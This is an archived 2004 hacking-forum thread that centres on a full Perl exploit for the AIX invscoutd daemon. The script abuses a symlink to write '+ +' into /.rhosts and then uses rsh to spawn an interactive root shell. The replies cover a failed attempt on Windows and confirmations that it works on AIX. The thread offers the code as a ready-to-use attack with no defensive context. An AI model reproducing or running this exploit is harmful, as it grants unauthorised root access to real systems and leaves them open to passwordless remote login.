nowhere
Apr 6 2004, 01:04 PM
| QUOTE |
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested: on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author: watercloud@xfocus.org
# Site: www.xfocus.org www.xfocus.net
# Date: 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null"; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF |
Burner
Apr 7 2004, 03:37 PM
hmm nice exploit
but get follow error
| CODE |
ps wordt niet herkend als een interne
of externe opdracht, programma of batchbestand.
The symlink function is unimplemented at x_invscoutd.pl line 19. |
hope you can help
greetz
| QUOTE (Burner @ Apr 7 2004, 03:37 PM) |
hmm nice exploit
but get follow error
| CODE | ps wordt niet herkend als een interne
of externe opdracht, programma of batchbestand.
The symlink function is unimplemented at x_invscoutd.pl line 19. |
hope you can help
greetz
|
You did trie it on a AIX (Unix) box right?
Killaloop
Apr 7 2004, 07:15 PM
worked fine one my aix box.
its kinda old now
and anyways who needs an aix exploit nowadays
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
